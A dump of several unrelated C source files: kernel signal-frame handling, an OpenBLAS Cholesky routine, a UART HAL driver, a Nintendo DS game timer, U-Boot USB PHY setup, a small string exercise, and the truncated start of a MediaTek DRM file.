*) current_frame()->sp; if (verify_area(VERIFY_READ, frame, sizeof(*frame))) goto badframe; if (__copy_from_user(&set, &frame->uc.uc_sigmask, sizeof(set))) goto badframe; set_current_blocked(&set); if (restore_sigcontext(current_frame(), &frame->uc.uc_mcontext, &d0)) goto badframe; if (do_sigaltstack(&frame->uc.uc_stack, NULL, current_frame()->sp) == -EFAULT) goto badframe; return d0; badframe: force_sig(SIGSEGV, current); return 0; } /* * store the userspace context into a signal frame */ static int setup_sigcontext(struct sigcontext __user *sc, struct fpucontext *fpuctx, struct pt_regs *regs, unsigned long mask) { int tmp, err = 0; #define COPY(x) err |= __put_user(regs->x, &sc->x) COPY(d0); COPY(d1); COPY(d2); COPY(d3); COPY(a0); COPY(a1); COPY(a2); COPY(a3); COPY(e0); COPY(e1); COPY(e2); COPY(e3); COPY(e4); COPY(e5); COPY(e6); COPY(e7); COPY(lar); COPY(lir); COPY(mdr); COPY(mdrq); COPY(mcvf); COPY(mcrl); COPY(mcrh); COPY(sp); COPY(epsw); COPY(pc); #undef COPY tmp = fpu_setup_sigcontext(fpuctx); if (tmp < 0) err = 1; else err |= __put_user(tmp ? fpuctx : NULL, &sc->fpucontext); /* non-iBCS2 extensions.. */ err |= __put_user(mask, &sc->oldmask); return err; } /* * determine which stack to use.. */ static inline void __user *get_sigframe(struct k_sigaction *ka, struct pt_regs *regs, size_t frame_size) { unsigned long sp; /* default to using normal stack */ sp = regs->sp; /* this is the X/Open sanctioned signal stack switching. */ if (ka->sa.sa_flags & SA_ONSTACK) { if (sas_ss_flags(sp) == 0) sp = current->sas_ss_sp + current->sas_ss_size; } return (void __user *) ((sp - frame_size) & ~7UL); } /* * set up a normal signal frame */ static int setup_frame(int sig, struct k_sigaction *ka, sigset_t *set, struct pt_regs *regs) { struct sigframe __user *frame; int rsig; frame = get_sigframe(ka, regs, sizeof(*frame)); if (!access_ok(VERIFY_WRITE, frame, sizeof(*frame))) goto give_sigsegv; rsig = sig; if (sig < 32 && current_thread_info()->exec_domain && current_thread_info()->exec_domain->signal_invmap) rsig = current_thread_info()->exec_domain->signal_invmap[sig]; if (__put_user(rsig, &frame->sig) < 0 || __put_user(&frame->sc, &frame->psc) < 0) goto give_sigsegv; if (setup_sigcontext(&frame->sc, &frame->fpuctx, regs, set->sig[0])) goto give_sigsegv; if (_NSIG_WORDS > 1) { if (__copy_to_user(frame->extramask, &set->sig[1], sizeof(frame->extramask))) goto give_sigsegv; } /* set up to return from userspace. If provided, use a stub already in * userspace */ if (ka->sa.sa_flags & SA_RESTORER) { if (__put_user(ka->sa.sa_restorer, &frame->pretcode)) goto give_sigsegv; } else { if (__put_user((void (*)(void))frame->retcode, &frame->pretcode)) goto give_sigsegv; /* this is mov $,d0; syscall 0 */ if (__put_user(0x2c, (char *)(frame->retcode + 0)) || __put_user(__NR_sigreturn, (char *)(frame->retcode + 1)) || __put_user(0x00, (char *)(frame->retcode + 2)) || __put_user(0xf0, (char *)(frame->retcode + 3)) || __put_user(0xe0, (char *)(frame->retcode + 4))) goto give_sigsegv; flush_icache_range((unsigned long) frame->retcode, (unsigned long) frame->retcode + 5); } /* set up registers for signal handler */ regs->sp = (unsigned long) frame; regs->pc = (unsigned long) ka->sa.sa_handler; regs->d0 = sig; regs->d1 = (unsigned long) &frame->sc; #if DEBUG_SIG printk(KERN_DEBUG "SIG deliver %d (%s:%d): sp=%p pc=%lx ra=%p\n", sig, current->comm, current->pid, frame, regs->pc, frame->pretcode); #endif return 0; give_sigsegv: force_sigsegv(sig, current); return -EFAULT; } /* * set up a realtime signal frame */ static int setup_rt_frame(int sig, struct k_sigaction *ka, siginfo_t *info, sigset_t *set, struct pt_regs *regs) { struct rt_sigframe __user *frame; int rsig; frame = get_sigframe(ka, regs, sizeof(*frame)); if (!access_ok(VERIFY_WRITE, frame, sizeof(*frame))) goto give_sigsegv; rsig = sig; if (sig < 32 && current_thread_info()->exec_domain && current_thread_info()->exec_domain->signal_invmap) rsig = current_thread_info()->exec_domain->signal_invmap[sig]; if (__put_user(rsig, &frame->sig) || __put_user(&frame->info, &frame->pinfo) || __put_user(&frame->uc, &frame->puc) || copy_siginfo_to_user(&frame->info, info)) goto give_sigsegv; /* create the ucontext. */ if (__put_user(0, &frame->uc.uc_flags) || __put_user(0, &frame->uc.uc_link) || __put_user((void *)current->sas_ss_sp, &frame->uc.uc_stack.ss_sp) || __put_user(sas_ss_flags(regs->sp), &frame->uc.uc_stack.ss_flags) || __put_user(current->sas_ss_size, &frame->uc.uc_stack.ss_size) || setup_sigcontext(&frame->uc.uc_mcontext, &frame->fpuctx, regs, set->sig[0]) || __copy_to_user(&frame->uc.uc_sigmask, set, sizeof(*set))) goto give_sigsegv; /* set up to return from userspace. If provided, use a stub already in * userspace */ if (ka->sa.sa_flags & SA_RESTORER) { if (__put_user(ka->sa.sa_restorer, &frame->pretcode)) goto give_sigsegv; } else { if (__put_user((void(*)(void))frame->retcode, &frame->pretcode) || /* This is mov $,d0; syscall 0 */ __put_user(0x2c, (char *)(frame->retcode + 0)) || __put_user(__NR_rt_sigreturn, (char *)(frame->retcode + 1)) || __put_user(0x00, (char *)(frame->retcode + 2)) || __put_user(0xf0, (char *)(frame->retcode + 3)) || __put_user(0xe0, (char *)(frame->retcode + 4))) goto give_sigsegv; flush_icache_range((u_long) frame->retcode, (u_long) frame->retcode + 5); } /* Set up registers for signal handler */ regs->sp = (unsigned long) frame; regs->pc = (unsigned long) ka->sa.sa_handler; regs->d0 = sig; regs->d1 = (long) &frame->info; #if DEBUG_SIG printk(KERN_DEBUG "SIG deliver %d (%s:%d): sp=%p pc=%lx ra=%p\n", sig, current->comm, current->pid, frame, regs->pc, frame->pretcode); #endif return 0; give_sigsegv: force_sigsegv(sig, current); return -EFAULT; } static inline void stepback(struct pt_regs *regs) { regs->pc -= 2; regs->orig_d0 = -1; } /* * handle the actual delivery of a signal to userspace */ static int handle_signal(int sig, siginfo_t *info, struct k_sigaction *ka, struct pt_regs *regs) { sigset_t *oldset = sigmask_to_save(); int ret; /* Are we from a system call? */ if (regs->orig_d0 >= 0) { /* If so, check system call restarting.. */ switch (regs->d0) { case -ERESTART_RESTARTBLOCK: case -ERESTARTNOHAND: regs->d0 = -EINTR; break; case -ERESTARTSYS: if (!(ka->sa.sa_flags & SA_RESTART)) { regs->d0 = -EINTR; break; } /* fallthrough */ case -ERESTARTNOINTR: regs->d0 = regs->orig_d0; stepback(regs); } } /* Set up the stack frame */ if (ka->sa.sa_flags & SA_SIGINFO) ret = setup_rt_frame(sig, ka, info, oldset, regs); else ret = setup_frame(sig, ka, oldset, regs); if (ret) return ret; signal_delivered(sig, info, ka, regs, test_thread_flag(TIF_SINGLESTEP)); return 0; } /* * handle a potential signal */ static void do_signal(struct pt_regs *regs) { struct k_sigaction ka; siginfo_t info; int signr; signr = get_signal_to_deliver(&info, &ka, regs, NULL); if (signr > 0) { if (handle_signal(signr, &info, &ka, regs) == 0) { } return; } /* did we come from a system call? */ if (regs->orig_d0 >= 0) { /* restart the system call - no handlers present */ switch (regs->d0) { case -ERESTARTNOHAND: case -ERESTARTSYS: case -ERESTARTNOINTR: regs->d0 = regs->orig_d0; stepback(regs); break; case -ERESTART_RESTARTBLOCK: regs->d0 = __NR_restart_syscall; stepback(regs); break; } } /* if there's no signal to deliver, we just put the saved sigmask * back */ restore_saved_sigmask(); } /* * notification of userspace execution resumption * - triggered by current->work.notify_resume */ asmlinkage void do_notify_resume(struct pt_regs *regs, u32 thread_info_flags) { /* Pending single-step? */ if (thread_info_flags & _TIF_SINGLESTEP) { #ifndef CONFIG_MN10300_USING_JTAG regs->epsw |= EPSW_T; clear_thread_flag(TIF_SINGLESTEP); #else BUG(); /* no h/w single-step if using JTAG unit */ #endif } /* deal with pending signal delivery */ if (thread_info_flags & _TIF_SIGPENDING) do_signal(regs); if (thread_info_flags & _TIF_NOTIFY_RESUME) { clear_thread_flag(TIF_NOTIFY_RESUME); tracehook_notify_resume(current_frame()); } }
397621.c
/*********************************************************************/ /* */ /* Optimized BLAS libraries */ /* By Kazushige Goto <kgoto@tacc.utexas.edu> */ /* */ /* Copyright (c) The University of Texas, 2009. All rights reserved. */ /* UNIVERSITY EXPRESSLY DISCLAIMS ANY AND ALL WARRANTIES CONCERNING */ /* THIS SOFTWARE AND DOCUMENTATION, INCLUDING ANY WARRANTIES OF */ /* MERCHANTABILITY, FITNESS FOR ANY PARTICULAR PURPOSE, */ /* NON-INFRINGEMENT AND WARRANTIES OF PERFORMANCE, AND ANY WARRANTY */ /* THAT MIGHT OTHERWISE ARISE FROM COURSE OF DEALING OR USAGE OF */ /* TRADE. NO WARRANTY IS EITHER EXPRESS OR IMPLIED WITH RESPECT TO */ /* THE USE OF THE SOFTWARE OR DOCUMENTATION. */ /* Under no circumstances shall University be liable for incidental, */ /* special, indirect, direct or consequential damages or loss of */ /* profits, interruption of business, or related expenses which may */ /* arise from use of Software or Documentation, including but not */ /* limited to those resulting from defects in Software and/or */ /* Documentation, or loss or inaccuracy of data of any kind. */ /*********************************************************************/ #include <stdio.h> #include <math.h> #include "common.h" static FLOAT dm1 = -1.; static FLOAT dp1 = 1.; #ifndef SQRT #define SQRT(x) sqrt(x) #endif blasint CNAME(blas_arg_t *args, BLASLONG *range_m, BLASLONG *range_n, FLOAT *sa, FLOAT *sb, BLASLONG myid) { BLASLONG n, lda; FLOAT *a; FLOAT ajj; FLOAT *aoffset; BLASLONG i, j; n = args -> n; a = (FLOAT *)args -> a; lda = args -> lda; if (range_n) { n = range_n[1] - range_n[0]; a += range_n[0] * (lda + 1) * COMPSIZE; } aoffset = a; for (j = 0; j < n; j++) { ajj = *(aoffset + j) - DOTU_K(j, a + j, lda, a + j, lda); if (ajj <= 0){ *(aoffset + j) = ajj; return j + 1; } ajj = SQRT(ajj); *(aoffset + j) = ajj; i = n - j - 1; if (i > 0) { GEMV_N(i, j, 0, dm1, a + j + 1, lda, a + j, lda, aoffset + j + 1, 1, sb); SCAL_K(i, 0, 0, dp1 / ajj, aoffset + j + 1, 1, NULL, 0, NULL, 0); } aoffset += lda; } return 0; }
437968.c
/** ****************************************************************************** * @file HAL_uart.c * @author AE Team * @version V1.1.1 * @date 15/05/2019 * @brief This file provides all the UART firmware functions. ****************************************************************************** * @copy * * THE PRESENT FIRMWARE WHICH IS FOR GUIDANCE ONLY AIMS AT PROVIDING CUSTOMERS * WITH CODING INFORMATION REGARDING THEIR PRODUCTS IN ORDER FOR THEM TO SAVE * TIME. AS A RESULT, MindMotion SHALL NOT BE HELD LIABLE FOR ANY * DIRECT, INDIRECT OR CONSEQUENTIAL DAMAGES WITH RESPECT TO ANY CLAIMS ARISING * FROM THE CONTENT OF SUCH FIRMWARE AND/OR THE USE MADE BY CUSTOMERS OF THE * CODING INFORMATION CONTAINED HEREIN IN CONNECTION WITH THEIR PRODUCTS. * * <h2><center>&copy; COPYRIGHT 2019 MindMotion</center></h2> */ /* Includes ------------------------------------------------------------------*/ #include "HAL_uart.h" #include "HAL_rcc.h" /** @addtogroup StdPeriph_Driver * @{ */ /** @defgroup UART * @brief UART driver modules * @{ */ /** @defgroup UART_Private_TypesDefinitions * @{ */ /** * @} */ /** @defgroup UART_Private_Defines * @{ */ /* UART UE Mask */ #define GCR_UE_Set ((uint16_t)0x0001) /* UART Enable Mask */ #define GCR_UE_Reset ((uint16_t)0xFFFE) /* UART Disable Mask */ #define CCR_CLEAR_Mask ((uint32_t)0xFFFFFF30) /* UART CCR Mask */ #define GCR_CLEAR_Mask ((uint32_t)0xFFFFFFE0) /* UART GCR Mask */ /** * @} */ /** @defgroup UART_Private_Macros * @{ */ /** * @} */ /** @defgroup UART_Private_Variables * @{ */ /** * @} */ /** @defgroup UART_Private_FunctionPrototypes * @{ */ /** * @} */ /** @defgroup UART_Private_Functions * @{ */ /** * @brief Deinitializes the UARTx peripheral registers to their * default reset values. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @retval : None */ void UART_DeInit(UART_TypeDef *UARTx) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); #ifdef UART2 if(UART2 == UARTx) { RCC_APB1PeriphResetCmd(RCC_APB1Periph_UART2, ENABLE); RCC_APB1PeriphResetCmd(RCC_APB1Periph_UART2, DISABLE); } #endif #ifdef UART1 if(UART1 == UARTx) { RCC_APB2PeriphResetCmd(RCC_APB2Periph_UART1, ENABLE); RCC_APB2PeriphResetCmd(RCC_APB2Periph_UART1, DISABLE); } #endif } /** * @brief Initializes the UARTx peripheral according to the specified * parameters in the UART_InitStruct . * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_InitStruct: pointer to a UART_InitTypeDef structure * that contains the configuration information for the * specified UART peripheral. * @retval : None */ void UART_Init(UART_TypeDef *UARTx, UART_InitTypeDef *UART_InitStruct) { uint32_t tmpreg = 0x00, apbclock = 0x00; uint32_t tmpreg1 = 0x00; uint32_t UARTxbase = 0; RCC_ClocksTypeDef RCC_ClocksStatus; /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_UART_BAUDRATE(UART_InitStruct->UART_BaudRate)); assert_param(IS_UART_WORD_LENGTH(UART_InitStruct->UART_WordLength)); assert_param(IS_UART_STOPBITS(UART_InitStruct->UART_StopBits)); assert_param(IS_UART_PARITY(UART_InitStruct->UART_Parity)); assert_param(IS_UART_MODE(UART_InitStruct->UART_Mode)); assert_param(IS_UART_HARDWARE_FLOW_CONTROL(UART_InitStruct->UART_HardwareFlowControl)); UARTxbase = (*(uint32_t *)&UARTx); /*---------------------------- UART CCR Configuration -----------------------*/ /* get UART CCR values */ tmpreg = UARTx->CCR; /* Clear spb,psel,pen bits */ tmpreg &= CCR_CLEAR_Mask; /* Configure the UART Word Length,the UART Stop Bits,Parity ------------*/ /* Set the char bits according to UART_WordLength value */ /* Set spb bit according to UART_StopBits value */ /* Set PEN bit according to UART_Parity value */ tmpreg |= (uint32_t)UART_InitStruct->UART_WordLength | (uint32_t)UART_InitStruct->UART_StopBits | UART_InitStruct->UART_Parity; /* Write to UART CCR */ UARTx->CCR = tmpreg; /*---------------------------- UART GCR Configuration -----------------------*/ /* get UART GCR values */ tmpreg = UARTx->GCR; /* Clear TXEN and RXEN ,autoflowen, mode ,uarten bits */ tmpreg &= GCR_CLEAR_Mask; /* Set autorlowen bit according to UART_HardwareFlowControl value */ /* Set rxen,txen bits according to UART_Mode value */ tmpreg |= UART_InitStruct->UART_HardwareFlowControl | UART_InitStruct->UART_Mode; /* Write to UART GCR */ UARTx->GCR = tmpreg; /*---------------------------- UART BRR Configuration -----------------------*/ /* Configure the UART Baud Rate -------------------------------------------*/ RCC_GetClocksFreq(&RCC_ClocksStatus); if (UARTxbase == UART2_BASE) { apbclock = RCC_ClocksStatus.PCLK1_Frequency; } else { apbclock = RCC_ClocksStatus.PCLK2_Frequency; } /* Determine the UART_baud*/ tmpreg = (apbclock / UART_InitStruct->UART_BaudRate) / 16; tmpreg1 = (apbclock / UART_InitStruct->UART_BaudRate) % 16; UARTx->BRR = tmpreg; UARTx->FRA = tmpreg1; } /** * @brief Fills each UART_InitStruct member with its default value. * @param UART_InitStruct: pointer to a UART_InitTypeDef structure * which will be initialized. * @retval : None */ void UART_StructInit(UART_InitTypeDef *UART_InitStruct) { /* UART_InitStruct members default value */ UART_InitStruct->UART_BaudRate = 9600; UART_InitStruct->UART_WordLength = UART_WordLength_8b; UART_InitStruct->UART_StopBits = UART_StopBits_1; UART_InitStruct->UART_Parity = UART_Parity_No; UART_InitStruct->UART_Mode = UART_Mode_Rx | UART_Mode_Tx; UART_InitStruct->UART_HardwareFlowControl = UART_HardwareFlowControl_None; } /** * @brief Enables or disables the specified UART peripheral. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param NewState: new state of the UARTx peripheral. * This parameter can be: ENABLE or DISABLE. * @retval : None */ void UART_Cmd(UART_TypeDef *UARTx, FunctionalState NewState) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_FUNCTIONAL_STATE(NewState)); if (NewState != DISABLE) { /* Enable the selected UART by setting the uarten bit in the GCR register */ UARTx->GCR |= GCR_UE_Set; } else { /* Disable the selected UART by clearing the uarten bit in the GCR register */ UARTx->GCR &= GCR_UE_Reset; } } /** * @brief Enables or disables the specified UART interrupts. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_IT: specifies the UART interrupt sources to be * enabled or disabled. * This parameter can be one of the following values: * * @arg UART_IT_ERR: Error interrupt(Frame error,) * @arg UART_IT_PE: Parity Error interrupt * @arg UART_OVER_ERR: overrun Error interrupt * @arg UART_TIMEOUT_ERR: timeout Error interrupt * @arg UART_IT_RXIEN: Receive Data register interrupt * @arg UART_IT_TXIEN: Tansmit Data Register empty interrupt * @param NewState: new state of the specified UARTx interrupts. * This parameter can be: ENABLE or DISABLE. * @retval : None */ void UART_ITConfig(UART_TypeDef *UARTx, uint16_t UART_IT, FunctionalState NewState) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_UART_CONFIG_IT(UART_IT)); assert_param(IS_FUNCTIONAL_STATE(NewState)); if (NewState != DISABLE) { /* Enable the UART_IT interrupt */ UARTx->IER |= UART_IT; } else { /* Disable the UART_IT interrupt */ UARTx->IER &= ~UART_IT; } } /** * @brief Enables or disables the UART�s DMA interface. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2 . * @param UART_DMAReq: specifies the DMA request. * This parameter can be any combination of the following values: * @arg UART_DMAReq_EN: UART DMA transmit request * * @param NewState: new state of the DMA Request sources. * This parameter can be: ENABLE or DISABLE. * @note The DMA mode is not available for UART5. * @retval : None */ void UART_DMACmd(UART_TypeDef *UARTx, uint16_t UART_DMAReq, FunctionalState NewState) { /* Check the parameters */ assert_param(IS_UART_1234_PERIPH(UARTx)); assert_param(IS_UART_DMAREQ(UART_DMAReq)); assert_param(IS_FUNCTIONAL_STATE(NewState)); if (NewState != DISABLE) { /* Enable the DMA transfer */ UARTx->GCR |= UART_DMAReq; } else { /* Disable the DMA transfer */ UARTx->GCR &= ~UART_DMAReq; } } /** * @brief Transmits single data through the UARTx peripheral. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param Data: the data to transmit. * @retval : None */ void UART_SendData(UART_TypeDef *UARTx, uint16_t Data) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_UART_DATA(Data)); /* Transmit Data */ UARTx->TDR = (Data & (uint16_t)0x00FF); } /** * @brief Returns the most recent received data by the UARTx peripheral. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @retval : The received data. */ uint16_t UART_ReceiveData(UART_TypeDef *UARTx) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); /* Receive Data */ return (uint16_t)(UARTx->RDR & (uint16_t)0x00FF); } /** * @brief Checks whether the specified UART flag is set or not. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_FLAG: specifies the flag to check. * This parameter can be one of the following values: * @arg UART_FLAG_TXEMPTY:Transmit data register empty flag * @arg UART_FLAG_TXFULL:Transmit data buffer full * @arg UART_FLAG_RXAVL:RX Buffer has a byte flag * @arg UART_FLAG_OVER:OverRun Error flag * @arg UART_FLAG_TXEPT: tx and shifter are emptys flag * @retval : The new state of UART_FLAG (SET or RESET). */ FlagStatus UART_GetFlagStatus(UART_TypeDef *UARTx, uint16_t UART_FLAG) { FlagStatus bitstatus = RESET; /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_UART_FLAG(UART_FLAG)); if ((UARTx->CSR & UART_FLAG) != (uint16_t)RESET) { bitstatus = SET; } else { bitstatus = RESET; } return bitstatus; } /** * @brief Clears the UARTx's pending flags. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_FLAG: specifies the flag to clear. * This parameter can be any combination of the following values: * @arg UART_FLAG_TXEMPTY:Transmit data register empty flag * @arg UART_FLAG_TXFULL:Transmit data buffer full * @arg UART_FLAG_RXAVL:RX Buffer has a byte flag * @arg UART_FLAG_OVER:OverRun Error flag * @arg UART_FLAG_TXEPT: tx and shifter are emptys flag * @retval : None */ void UART_ClearFlag(UART_TypeDef *UARTx, uint16_t UART_FLAG) { } /** * @brief Checks whether the specified UART interrupt has occurred or not. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_IT: specifies the UART interrupt source to check. * This parameter can be one of the following values: * @arg UART_IT_ERR: Error interrupt(Frame error,) * @arg UART_IT_PE: Parity Error interrupt * @arg UART_OVER_ERR: overrun Error interrupt * @arg UART_TIMEOUT_ERR: timeout Error interrupt * @arg UART_IT_RXIEN: Receive Data register interrupt * @arg UART_IT_TXIEN: Tansmit Data Register empty interrupt * @retval : The new state of UART_IT (SET or RESET). */ ITStatus UART_GetITStatus(UART_TypeDef *UARTx, uint16_t UART_IT) { FlagStatus bitstatus = RESET; /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_UART_FLAG(UART_FLAG)); assert_param(IS_UART_PERIPH_FLAG(UARTx, UART_FLAG)); /* The CTS flag is not available for UART4 and UART5 */ if ((UARTx->ISR & UART_IT) != (uint16_t)RESET) { bitstatus = SET; } else { bitstatus = RESET; } return bitstatus; } /** * @brief Clears the UARTx�s interrupt pending bits. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_IT: specifies the interrupt pending bit to clear. * This parameter can be one of the following values: * @arg UART_IT_ERR: Error interrupt(Frame error,) * @arg UART_IT_PE: Parity Error interrupt * @arg UART_OVER_ERR: overrun Error interrupt * @arg UART_TIMEOUT_ERR: timeout Error interrupt * @arg UART_IT_RXIEN: Receive Data register interrupt * @arg UART_IT_TXIEN: Tansmit Data Register empty interrupt * @retval : None */ void UART_ClearITPendingBit(UART_TypeDef *UARTx, uint16_t UART_IT) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); assert_param(IS_UART_CLEAR_IT(UART_IT)); assert_param(IS_UART_PERIPH_IT(UARTx, UART_IT)); /* The CTS interrupt is not available for UART4 and UART5 */ /*clear UART_IT pendings bit*/ UARTx->ICR = UART_IT; } /** * @} */ /** * @} */ /** * @} */ /*-------------------------(C) COPYRIGHT 2019 MindMotion ----------------------*/
216950.c
/* * Created on: Dec 11, 2018 * Author: nds */ #include "timer_game.h" #include "graphics_sub.h" #include "game.h" int msec, sec, min, overSec; int audioCycles = 0; soundEffectType currentSF; void init_timers(){ TIMER_DATA(0) = TIMER_FREQ(100); TIMER0_CR = TIMER_ENABLE | TIMER_DIV_64 | TIMER_IRQ_REQ; irqSet(IRQ_TIMER0, timer0_ISR); TIMER_DATA(1) = TIMER_FREQ(60); TIMER1_CR = TIMER_ENABLE | TIMER_DIV_64 | TIMER_IRQ_REQ; irqSet(IRQ_TIMER1, timer1_ISR); } void restart_timer(){ msec = 0; sec = 0; min = 0; } void timer0_ISR() { if (msec < 1000) msec += 10; else { msec = 0; if (sec < 60){ sec++; // player loose fuel if waiting doing nothing player_fuel--; if(gameOver) overSec++; } else { sec = 0; if (min < 60) min++; else min = 0; } } drilling = false; } void timer1_ISR() { flying = 0; print_fuel(20, 5, 12); print_drill_health(20, 9, 12); // sound effect state machine if (audioCycles == 0 && nextSF != NONE) { currentSF = nextSF; nextSF = NONE; } switch (currentSF){ case COIN: Audio_PlaySoundEX(SFX_COIN_PICKUP); audioCycles = 10; currentSF = NONE; break; case DRILL: Audio_PlaySoundEX(SFX_BULLDOZER); audioCycles = 10; currentSF = NONE; break; default: if (audioCycles != 0) audioCycles--; break; } }
823261.c
// SPDX-License-Identifier: GPL-2.0+ /* * drivers/usb/gadget/dwc2_udc_otg.c * Designware DWC2 on-chip full/high speed USB OTG 2.0 device controllers * * Copyright (C) 2008 for Samsung Electronics * * BSP Support for Samsung's UDC driver * available at: * git://git.kernel.org/pub/scm/linux/kernel/git/kki_ap/linux-2.6-samsung.git * * State machine bugfixes: * Marek Szyprowski <m.szyprowski@samsung.com> * * Ported to u-boot: * Marek Szyprowski <m.szyprowski@samsung.com> * Lukasz Majewski <l.majewski@samsumg.com> */ #include <common.h> #include <linux/errno.h> #include <linux/list.h> #include <malloc.h> #include <linux/usb/ch9.h> #include <linux/usb/gadget.h> #include <asm/byteorder.h> #include <asm/unaligned.h> #include <asm/io.h> #include <asm/mach-types.h> #include "dwc2_udc_otg_regs.h" #include "dwc2_udc_otg_priv.h" #include <usb/dwc2_udc.h> void otg_phy_init(struct dwc2_udc *dev) { unsigned int usb_phy_ctrl = dev->pdata->usb_phy_ctrl; struct dwc2_usbotg_phy *phy = (struct dwc2_usbotg_phy *)dev->pdata->regs_phy; dev->pdata->phy_control(1); /* USB PHY0 Enable */ printf("USB PHY0 Enable\n"); /* Enable PHY */ writel(readl(usb_phy_ctrl) | USB_PHY_CTRL_EN0, usb_phy_ctrl); if (dev->pdata->usb_flags == PHY0_SLEEP) /* C210 Universal */ writel((readl(&phy->phypwr) &~(PHY_0_SLEEP | OTG_DISABLE_0 | ANALOG_PWRDOWN) &~FORCE_SUSPEND_0), &phy->phypwr); else /* C110 GONI */ writel((readl(&phy->phypwr) &~(OTG_DISABLE_0 | ANALOG_PWRDOWN) &~FORCE_SUSPEND_0), &phy->phypwr); if (s5p_cpu_id == 0x4412) writel((readl(&phy->phyclk) & ~(EXYNOS4X12_ID_PULLUP0 | EXYNOS4X12_COMMON_ON_N0)) | EXYNOS4X12_CLK_SEL_24MHZ, &phy->phyclk); /* PLL 24Mhz */ else writel((readl(&phy->phyclk) & ~(ID_PULLUP0 | COMMON_ON_N0)) | CLK_SEL_24MHZ, &phy->phyclk); /* PLL 24Mhz */ writel((readl(&phy->rstcon) &~(LINK_SW_RST | PHYLNK_SW_RST)) | PHY_SW_RST0, &phy->rstcon); udelay(10); writel(readl(&phy->rstcon) &~(PHY_SW_RST0 | LINK_SW_RST | PHYLNK_SW_RST), &phy->rstcon); udelay(10); } void otg_phy_off(struct dwc2_udc *dev) { unsigned int usb_phy_ctrl = dev->pdata->usb_phy_ctrl; struct dwc2_usbotg_phy *phy = (struct dwc2_usbotg_phy *)dev->pdata->regs_phy; /* reset controller just in case */ writel(PHY_SW_RST0, &phy->rstcon); udelay(20); writel(readl(&phy->phypwr) &~PHY_SW_RST0, &phy->rstcon); udelay(20); writel(readl(&phy->phypwr) | OTG_DISABLE_0 | ANALOG_PWRDOWN | FORCE_SUSPEND_0, &phy->phypwr); writel(readl(usb_phy_ctrl) &~USB_PHY_CTRL_EN0, usb_phy_ctrl); writel((readl(&phy->phyclk) & ~(ID_PULLUP0 | COMMON_ON_N0)), &phy->phyclk); udelay(10000); dev->pdata->phy_control(0); }
717285.c
#include <stdio.h> int tamstring(char *string, int tam){ int i = 0; while(string[i] != '\0'){ tam++; i++; } return tam; } int main(){ char string[1001]; char stringmaior[1001]; int maiortam = 0, tam = 0, qtdstrings, tamres; scanf("%d", &qtdstrings); for(int i = 0; i<qtdstrings; i++){ scanf(" %s", string); tamres = tamstring(string, tam); if(tamres > maiortam){ maiortam = tamres; for(int i = 0; i<tamres; i++) stringmaior[i] = string[i]; } } for(int i = 0; i<maiortam; i++) if(i == maiortam-1) printf("%c\n", stringmaior[i]); else printf("%c", stringmaior[i]); return 0; }
804527.c
// SPDX-License-Identifier: GPL-2.0-only /* * Copyright (c) 2015 MediaTek Inc. */ #include <linux/clk.h> #include <linux/iopoll.h> #include <linux/module.h> #include <linux/of_device.h> #include <linux/platform_device.h> #include <linux/regmap.h> #include "mtk_drm_ddp.h" #include "mtk_drm_ddp_comp.h" #define MT2701_DISP_MUTEX0_MOD0 0x2c #define MT2701_DISP_MUTEX0_SOF0 0x30 #define DISP_REG_MUTEX_EN(n) (0x20 + 0x20 * (n)) #define DISP_REG_MUTEX(n) (0x24 + 0x20 * (n)) #define DISP_REG_MUTEX_RST(n) (0x28 + 0x20 * (n)) #define DISP_REG_MUTEX_MOD(mutex_mod_reg, n) (mutex_mod_reg + 0x20 * (n)) #define DISP_REG_MUTEX_SOF(mutex_sof_reg, n) (mutex_sof_reg + 0x20 * (n)) #define DISP_REG_MUTEX_MOD2(n) (0x34 + 0x20 * (n)) #define INT_MUTEX BIT(1) #define MT8173_MUTEX_MOD_DISP_OVL0 11 #define MT8173_MUTEX_MOD_DISP_OVL1 12 #define MT8173_MUTEX_MOD_DISP_RDMA0 13 #define MT8173_MUTEX_MOD_DISP_RDMA1 14 #define MT8173_MUTEX_MOD_DISP_RDMA2 15 #define MT8173_MUTEX_MOD_DISP_WDMA0 16 #define MT8173_MUTEX_MOD_DISP_WDMA1 17 #define MT8173_MUTEX_MOD_DISP_COLOR0 18 #define MT8173_MUTEX_MOD_DISP_COLOR1 19 #define MT8173_MUTEX_MOD_DISP_AAL 20 #define MT8173_MUTEX_MOD_DISP_GAMMA 21 #define MT8173_MUTEX_MOD_DISP_UFOE 22 #define MT8173_MUTEX_MOD_DISP_PWM0 23 #define MT8173_MUTEX_MOD_DISP_PWM1 24 #define MT8173_MUTEX_MOD_DISP_OD 25 #define MT2712_MUTEX_MOD_DISP_PWM2 10 #define MT2712_MUTEX_MOD_DISP_OVL0 11 #define MT2712_MUTEX_MOD_DISP_OVL1 12 #define MT2712_MUTEX_MOD_DISP_RDMA0 13 #define MT2712_MUTEX_MOD_DISP_RDMA1 14 #define 